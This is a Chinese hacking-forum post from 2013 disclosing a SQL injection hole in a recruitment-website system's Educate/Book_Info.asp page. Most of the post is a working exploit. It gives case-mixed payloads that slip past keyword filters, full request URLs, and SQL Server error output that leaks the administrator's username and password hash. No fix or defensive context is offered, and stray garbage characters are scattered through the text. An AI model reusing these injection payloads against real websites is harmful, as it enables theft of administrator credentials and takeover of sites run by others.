找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2205|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:44:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp
, b* A( H+ u. X+ S' n + C# ~$ |+ ^6 ^# N/ u
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出5 z* h- c$ [  Y! G/ `' Y
. B( ^7 U2 D5 f
exp:如下
; ]5 `7 R1 H  m0 f: ^3 h/ y+ A1 p查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
( E9 j. X6 q  [& |* E% }* j查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
8 c# m9 v) ]3 H0 b; _# c, p
( B% ^: |* e; c: v* f, shttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
/ l- i2 R- h# H* f- ^$ h7 [ 6 I1 ?- |! d, y, k
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
8 I, O4 _$ K3 U1 B- T% X; `
1 O1 v: t% }' |; a2 e$ C将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。. W; ?- w) p  j6 d  g6 h9 C
) _+ z) k8 _: T" a4 A
/Educate/Book_Info.asp,行 8% [. A: j/ Y( ?) |4 h8 X
6 C9 b  V4 M3 S6 Z
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
6 z* K; Z; F3 s0 N8 q; _5 v
3 o; v" f1 M9 I' h+ TMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'$ W6 z1 C; D" `, G

; d4 O. L# k/ l将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。* [- P1 ^) U& K* A5 n. }3 o

6 G" L; I6 t6 r* @. I8 g6 ?3 Z/Educate/Book_Info.asp,行 8
0 n8 N2 K! J, ]1 t2 v& P8 @7 o8 G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表